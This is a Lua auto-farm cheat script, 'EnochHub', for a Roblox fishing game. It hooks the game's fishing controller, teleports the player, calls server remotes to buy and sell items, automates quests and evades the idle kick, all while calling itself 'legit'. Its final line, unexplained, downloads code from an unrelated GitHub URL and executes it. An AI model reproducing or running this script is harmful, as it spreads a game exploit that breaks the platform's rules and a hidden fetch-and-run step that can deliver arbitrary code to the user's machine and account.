-- ======================================================
-- ENOCHHUB | FULL AUTO: DEEP SEA -> LEVER -> ELEMENT
-- VERSION: v1.3.4 (Pure Legit Hook + Anti-Stuck)
-- ======================================================

repeat task.wait() until game:IsLoaded()
local Plrs = game:GetService("Players")
local MyLp = Plrs.LocalPlayer

-- 1. Respawn Awal
if MyLp.Character and MyLp.Character:FindFirstChild("Humanoid") then
    MyLp.Character.Humanoid.Health = 0 
end

MyLp.CharacterAdded:Wait()
MyLp.Character:WaitForChild("HumanoidRootPart", 10)
task.wait(3)

-- ===============================
-- SERVICES & VARS
-- ===============================
local TeleportService = game:GetService("TeleportService")
local GuiService = game:GetService("GuiService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local VirtualUser = game:GetService("VirtualUser")

local placeId = game.PlaceId
local serverId = game.JobId 

local STATE = {
    HasAstralRod = false, CurrentRod = "Checking...", CurrentRodID = 0, TotalCoins = 0,
    Mode = "Starting...", 
    FishCount = 0, FishPerMinute = 0.0, StartTime = os.time(),
    Status = "Starting...", Teleporting = false,
    CurrentArea = "None", TargetInfo = "None",
    CurrentBait = "None",
    IsReeling = false
}

-- ===============================
-- AUTO RECONNECT & ANTI-AFK
-- ===============================
GuiService.ErrorMessageChanged:Connect(function()
    task.wait(5)
    local errorMessage = GuiService:GetErrorMessage()
    if #errorMessage > 0 then
        TeleportService:TeleportToPlaceInstance(placeId, serverId, MyLp)
        task.wait(10)
        TeleportService:Teleport(placeId, MyLp)
    end
end)

MyLp.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
end)

-- ===============================
-- REMOTES & DATA
-- ===============================
local RPath = {"Packages","_Index","sleitnick_net@0.2.0","net"}
local function GetRemote(name)
    local cur = ReplicatedStorage
    for _, p in ipairs(RPath) do cur = cur:WaitForChild(p) end
    return cur:FindFirstChild(name)
end

local RE_EquipItem = GetRemote("RE/EquipItem")
local RE_EquipToolFromHotbar = GetRemote("RE/EquipToolFromHotbar")
local RE_UnequipItem = GetRemote("RE/UnequipItem")
local RF_UpdateAutoFishingState = GetRemote("RF/UpdateAutoFishingState")
local RF_SellAllItems = GetRemote("RF/SellAllItems")
local RF_PurchaseBait = GetRemote("RF/PurchaseBait")
local RF_PurchaseFishingRod = GetRemote("RF/PurchaseFishingRod")
local RE_ObtainedNewFishNotification = GetRemote("RE/ObtainedNewFishNotification")
local RF_PlaceLeverItem = GetRemote("RE/PlaceLeverItem")
local RF_CancelFishingInputs = GetRemote("RF/CancelFishingInputs")

local FishingController = require(ReplicatedStorage.Controllers.FishingController)
local ReplionClient = require(ReplicatedStorage.Packages.Replion).Client
local PlayerDataReplion = ReplionClient:WaitReplion("Data", 5)

-- ===============================
-- [[ PURE LEGIT HOOK SYSTEM ]]
-- ===============================
local HooksInstalled = false
local function InstallPureHook()
    if HooksInstalled then return end
    
    local oldStart = FishingController.FishingRodStarted
    local oldStop = FishingController.FishingStopped

    FishingController.FishingRodStarted = function(self, ...)
        oldStart(self, ...) 
        STATE.IsReeling = true
        STATE.Status = "Reeling (Legit)"
        local startTime = os.clock()

        task.spawn(function()
            task.wait(0.15) -- Reaction Time
            while STATE.IsReeling do
                -- Anti-Stuck Failsafe (15s)
                if (os.clock() - startTime) > 15 then
                    warn("âš ï¸ Minigame Stuck. Forcing Cancel...")
                    if RF_CancelFishingInputs then
                        pcall(function() RF_CancelFishingInputs:InvokeServer() end)
                    end
                    STATE.IsReeling = false
                    break
                end

                if self.RequestFishingMinigameClick then
                    self:RequestFishingMinigameClick()
                end
                task.wait(0.05) -- Click Speed
            end
        end)
    end

    FishingController.FishingStopped = function(self, ...)
        oldStop(self, ...)
        STATE.IsReeling = false
        STATE.Status = "Casting"
    end
    
    HooksInstalled = true
    print("âœ… Pure Legit Hook Installed")
end

-- ===============================
-- CONFIGURATION & DATA
-- ===============================
local FishingAreas = {
    ["Enchant Room"]={Pos=Vector3.new(3255,-1301,1371),Look=Vector3.new(0,0,-1)},
    ["Treasure Room"]={Pos=Vector3.new(-3598,-281,-1645),Look=Vector3.new(-0.06,0,-1)},
    ["Sisyphus Statue"]={Pos=Vector3.new(-3743,-135,-1007),Look=Vector3.new(0.3,0,0.95)},
    ["Sacred Temple"]={Pos=Vector3.new(1461,-22,-670),Look=Vector3.new(-0.99,0,0.14)},
    ["Esoteric Island"]={Pos=Vector3.new(2164,3,1242),Look=Vector3.new(0,0,-1)},
    ["Ancient Jungle"]={Pos = Vector3.new(1535.639, 3.159, -193.352), Look = Vector3.new(0.505, 0, 0.863)}
}

local ShopRods = {
    {Name="Luck Rod", ID=79, Price=325}, {Name="Carbon Rod", ID=76, Price=750}, 
    {Name="Grass Rod", ID=85, Price=1500}, {Name="Demascus Rod", ID=77, Price=3000},
    {Name="Ice Rod", ID=78, Price=5000}, {Name="Lucky Rod", ID=4, Price=15000}, 
    {Name="Midnight Rod", ID=80, Price=50000}, {Name="Astral Rod", ID=5, Price=1000000},
}

local ShopBaits = {
    {ID=3, Price=3000, Name="Midnight Bait"}, {ID=17, Price=83500, Name="Nature Bait"}, 
    {ID=6, Price=290000, Name="Chroma Bait"}, {ID=4, Price=425000, Name="Royal Bait"},
    {ID=8, Price=630000, Name="Dark Matter Bait"}, {ID=15, Price=1148484, Name="Corrupt Bait"}, 
    {ID=16, Price=3700000, Name="Aether Bait"}, {ID=20, Price=4000000, Name="Floral Bait"},
    {ID=18, Price=8200000, Name="Singularity Bait"}
}

local ArtifactOrder = {"Hourglass Diamond Artifact", "Diamond Artifact", "Arrow Artifact", "Crescent Artifact"}
local ARTIFACT_IDS = {["Arrow Artifact"]=265, ["Crescent Artifact"]=266, ["Diamond Artifact"]=267, ["Hourglass Diamond Artifact"]=271}
local ArtifactData = {
    ["Hourglass Diamond Artifact"] = {LeverName="Hourglass Diamond Lever", ChildRef=6, Suffix="Crystal", UnlockColor=Color3.fromRGB(255, 248, 49), Pos=Vector3.new(1490, 3.3, -843), Look=Vector3.new(0.1, 0, 0.9), LeverPos=Vector3.new(1484.6, 8.4, -861.0)},
    ["Diamond Artifact"] = {LeverName="Diamond Lever", ChildRef="TempleLever", Suffix="Crystal", UnlockColor=Color3.fromRGB(219, 38, 255), Pos=Vector3.new(1844, 2.5, -288), Look=Vector3.new(0.9, 0, -0.1), LeverPos=Vector3.new(1818.9, 8.4, -284.1)},
    ["Arrow Artifact"] = {LeverName="Arrow Lever", ChildRef=5, Suffix="Crystal", UnlockColor=Color3.fromRGB(255, 47, 47), Pos=Vector3.new(874, 2.5, -358), Look=Vector3.new(-0.9, 0, 0.1), LeverPos=Vector3.new(898.2, 8.4, -361.8)},
    ["Crescent Artifact"] = {LeverName="Crescent Lever", ChildRef=4, Suffix="Crystal", UnlockColor=Color3.fromRGB(112, 255, 69), Pos=Vector3.new(1401, 6.4, 116), Look=Vector3.new(-0.5, 0, 0.8), LeverPos=Vector3.new(1419.7, 31.1, 78.5)},
}

-- ===============================
-- HELPERS & UTILS
-- ===============================
local function FormatNumber(n) if n>=1e6 then return string.format("%.2fM",n/1e6) elseif n>=1e3 then return string.format("%.1fK",n/1e3) else return tostring(n) end end
local function CalcStats() local mins = (os.time()-STATE.StartTime)/60; STATE.FishPerMinute = mins>0 and STATE.FishCount/mins or 0 end
local function FormatTime(s) return string.format("%02dh %02dm %02ds", math.floor(s/3600), math.floor((s%3600)/60), s%60) end

local function GetOwnedRods(inv)
    local owned = {}
    for _, r in ipairs(inv["Fishing Rods"] or {}) do table.insert(owned, tonumber(r.Id)) end
    return owned
end

local function IsLeverUnlocked(name)
    local jungle = workspace:FindFirstChild("JUNGLE INTERACTIONS")
    if not jungle then return false end
    local d = ArtifactData[name]
    local folder = (type(d.ChildRef)=="string" and jungle:FindFirstChild(d.ChildRef)) or jungle:GetChildren()[d.ChildRef]
    local crystal = folder and folder:FindFirstChild(d.Suffix)
    if not crystal then return false end
    local c1, c2 = crystal.Color, d.UnlockColor
    return math.abs(c1.R-c2.R)<0.05 and math.abs(c1.G-c2.G)<0.05 and math.abs(c1.B-c2.B)<0.05
end

local function Teleport(area)
    if STATE.Teleporting or not FishingAreas[area] then return end
    STATE.Teleporting = true
    STATE.CurrentArea = "TP -> " .. area
    pcall(function()
        MyLp.Character.HumanoidRootPart.CFrame = CFrame.new(FishingAreas[area].Pos, FishingAreas[area].Pos+FishingAreas[area].Look)
        task.wait(1.5)
        STATE.CurrentArea = area
    end)
    STATE.Teleporting = false
end

-- ===============================
-- AUTOMATION LOGIC
-- ===============================
local function AutoBuyBestBait()
    if not STATE.HasAstralRod or not PlayerDataReplion then return end
    local data = PlayerDataReplion:Get()
    local inv = data.Inventory or {}
    local owned = {}
    for _, b in pairs(inv["Baits"] or inv["Bait"] or {}) do owned[tonumber(b.Id)] = true end
    
    for i = #ShopBaits, 1, -1 do
        local bait = ShopBaits[i]
        if data.Coins >= bait.Price and not owned[bait.ID] then
            RF_PurchaseBait:InvokeServer(bait.ID)
            task.wait(0.3)
            break
        end
    end
end

local function EquipBestBait()
    if not PlayerDataReplion then return end
    local inv = PlayerDataReplion:GetExpect("Inventory")
    local bestBaitUUID, bestBaitPrice = nil, -1
    local baitList = inv["Baits"] or inv["Bait"] or {}
    
    for _, baitData in pairs(baitList) do
        local baitId = tonumber(baitData.Id)
        for _, shopBait in ipairs(ShopBaits) do
            if shopBait.ID == baitId and shopBait.Price > bestBaitPrice then
                bestBaitUUID = baitData.UUID
                bestBaitPrice = shopBait.Price
                STATE.CurrentBait = "Bait: " .. (shopBait.Name or baitId)
            end
        end
    end
    if bestBaitUUID then pcall(function() RE_EquipItem:FireServer(bestBaitUUID, "Baits") end) 
    else STATE.CurrentBait = "No Bait" end
end

local function EquipRod(nameID)
    if not PlayerDataReplion then return end
    local inv = PlayerDataReplion:GetExpect("Inventory")
    local rods = inv["Fishing Rods"] or {}
    local targetRod = nil
    
    for _, r in pairs(rods) do
        if nameID == "Best" then
            local bestPrice = -1
            for _, s in ipairs(ShopRods) do
                if tonumber(r.Id) == s.ID and s.Price > bestPrice then 
                    targetRod = r
                    bestPrice = s.Price
                    STATE.CurrentRod = s.Name
                    STATE.CurrentRodID = s.ID 
                end
            end
        elseif tonumber(r.Id) == nameID then 
            targetRod = r
            STATE.CurrentRodID = tonumber(r.Id)
            break 
        end
    end

    if targetRod then
        pcall(function()
            RE_EquipItem:FireServer(targetRod.UUID, "Fishing Rods")
            task.wait(0.2)
            if not MyLp.Character:FindFirstChildOfClass("Tool") then
                RE_EquipToolFromHotbar:FireServer(1)
            end
        end)
    end
end

-- ===============================
-- QUEST CHECKERS
-- ===============================
local function CheckDeepSeaQuest(data)
    local quest = data.Quests and data.Quests.Mainline and data.Quests.Mainline["Deep Sea Quest"]
    if not quest then return "Done" end
    local sObj = quest.CurrentObj or 1
    local progMap = {}
    for _,o in pairs(quest.Objectives or {}) do progMap[o.Id] = o.Progress or 0 end
    local actObj = sObj
    if actObj==1 and (progMap[1] or 0)>=300 then actObj=2 end
    if actObj==2 and (progMap[2] or 0)>=3 then actObj=3 end
    if actObj==3 and (progMap[3] or 0)>=1 then actObj=4 end
    if actObj==4 and (progMap[4] or 0)>=1000000 then return "Done" end 
    if actObj==1 then return "DeepSea", "Treasure Room", (progMap[1] or 0).."/300 Fish"
    elseif actObj==2 then return "DeepSea", "Sisyphus Statue", (progMap[2] or 0).."/3 Mythic"
    elseif actObj==3 then return "DeepSea", "Sisyphus Statue", (progMap[3] or 0).."/1 Secret"
    elseif actObj==4 then return "DeepSea", (table.find(GetOwnedRods(data.Inventory),5) and "Sacred Temple" or "Esoteric Island"), (progMap[4] or 0).."/1M Coins"
    end
    return "Done"
end

local function CheckElementQuest(data)
    local quest = data.Quests and data.Quests.Mainline and data.Quests.Mainline["Element Quest"]
    if not quest then return "Check" end 
    local progMap = {}
    for _,o in pairs(quest.Objectives or {}) do progMap[o.Id] = o.Progress or 0 end
    if (progMap[2] or 0) < 1 then return "Element", "Ancient Jungle", "Catch Secret (Jungle)" end
    if (progMap[3] or 0) < 1 then return "Element", "Sacred Temple", "Catch Secret (Temple)" end
    return "Finished"
end

-- ===============================
-- MAIN GAME LOOP
-- ===============================
task.spawn(function()
    while task.wait(0.5) do
        pcall(function()
            if not PlayerDataReplion then return end
            local data = PlayerDataReplion:Get()
            STATE.TotalCoins = data.Coins or 0
            local inv = data.Inventory or {}
            local ownedRods = GetOwnedRods(inv)
            STATE.HasAstralRod = table.find(ownedRods, 5) ~= nil
            local hasGhostfin = table.find(ownedRods, 169) ~= nil

            AutoBuyBestBait()
            EquipBestBait()

            -- Logic Path
            if not STATE.HasAstralRod then
                local nextRodToBuy = nil
                for _, rod in ipairs(ShopRods) do if not table.find(ownedRods, rod.ID) then nextRodToBuy = rod; break end end
                
                if nextRodToBuy then
                    STATE.Mode = "FarmNextRod"
                    if STATE.TotalCoins >= nextRodToBuy.Price then 
                        STATE.TargetInfo = "BUYING " .. nextRodToBuy.Name 
                        RF_PurchaseFishingRod:InvokeServer(nextRodToBuy.ID)
                    else
                        STATE.TargetInfo = string.format("%s: %d%%", nextRodToBuy.Name, math.floor((STATE.TotalCoins/nextRodToBuy.Price)*100))
                    end
                    
                    local bestArea = "Enchant Room"
                    if table.find(ownedRods, 80) then bestArea = "Sisyphus Statue"
                    elseif table.find(ownedRods, 4) then bestArea = "Treasure Room" end
                    
                    EquipRod("Best")
                    if STATE.CurrentArea ~= bestArea then Teleport(bestArea) end
                    return
                end
            end

            local dsMode, dsLoc, dsProg = CheckDeepSeaQuest(data)
            if dsMode == "DeepSea" then
                STATE.Mode = "DeepSea"; STATE.TargetInfo = dsProg; EquipRod("Best")
                if STATE.CurrentArea ~= dsLoc then Teleport(dsLoc) end
                return
            end

            if hasGhostfin then
                local allLeversDone = true
                for _, art in ipairs(ArtifactOrder) do if not IsLeverUnlocked(art) then allLeversDone = false; break end end
                if not allLeversDone then
                    STATE.Mode = "Lever"; STATE.TargetInfo = "Unlocking Levers..."
                    -- Lever Execution
                    for _, artName in ipairs(ArtifactOrder) do
                        if not IsLeverUnlocked(artName) then
                            local d = ArtifactData[artName]
                            local hasArt = false
                            local id = ARTIFACT_IDS[artName]
                            local function check(t) for _,v in pairs(t or {}) do if v.Id==id then return true end end end
                            if check(inv["Lever Items"]) or check(inv.Items) then hasArt = true end
                            
                            if hasArt then
                                MyLp.Character.HumanoidRootPart.CFrame = CFrame.new(d.LeverPos)
                                task.wait(0.5)
                                RE_UnequipItem:FireServer("all")
                                RF_PlaceLeverItem:FireServer(artName)
                                task.wait(2)
                            else
                                EquipRod(169)
                                if STATE.CurrentArea ~= artName then Teleport(artName) end
                            end
                            break
                        end
                    end
                    return
                end
            elseif dsMode == "Done" then
                STATE.Mode = "Waiting"; STATE.TargetInfo = "Need Ghostfin Rod!"; Teleport("Esoteric Island")
                return
            end

            local elMode, elLoc, elProg = CheckElementQuest(data)
            if elMode == "Element" then
                STATE.Mode = "Element"; STATE.TargetInfo = elProg; EquipRod(169)
                if STATE.CurrentArea ~= elLoc then Teleport(elLoc) end
                return
            end
            
            STATE.Mode = "Finished"; STATE.TargetInfo = "All Quests Done"; Teleport("Esoteric Island")
        end)
    end
end)

-- ===============================
-- GUI & NOTIFS
-- ===============================
if RE_ObtainedNewFishNotification then
    RE_ObtainedNewFishNotification.OnClientEvent:Connect(function() 
        STATE.FishCount = STATE.FishCount + 1
        CalcStats()
    end)
end

-- Maintanance Loops
task.spawn(function()
    while task.wait(3) do pcall(function() RF_UpdateAutoFishingState:InvokeServer(true) end) end
end)

task.spawn(function()
    while task.wait(60) do pcall(function() RF_SellAllItems:InvokeServer() end) end
end)

-- Potato & Audio
task.spawn(function()
    while task.wait(5) do
        pcall(function()
            game.Lighting.GlobalShadows = false
            game.Lighting.Brightness = 0
            for _, v in ipairs(workspace:GetDescendants()) do
                if v:IsA("BasePart") then v.Transparency=1; v.CastShadow=false
                elseif v:IsA("Decal") or v:IsA("Texture") then v.Transparency=1 end
            end
        end)
    end
end)

RunService.RenderStepped:Connect(function() game:GetService("SoundService").Volume = 0 end)

-- Start
InstallPureHook()
print("ðŸš€ EnochHub Pure Legit (v1.3.4) Started!")
loadstring(game:HttpGet("https://raw.githubusercontent.com/FnDXueyi/list/refs/heads/main/game"))()
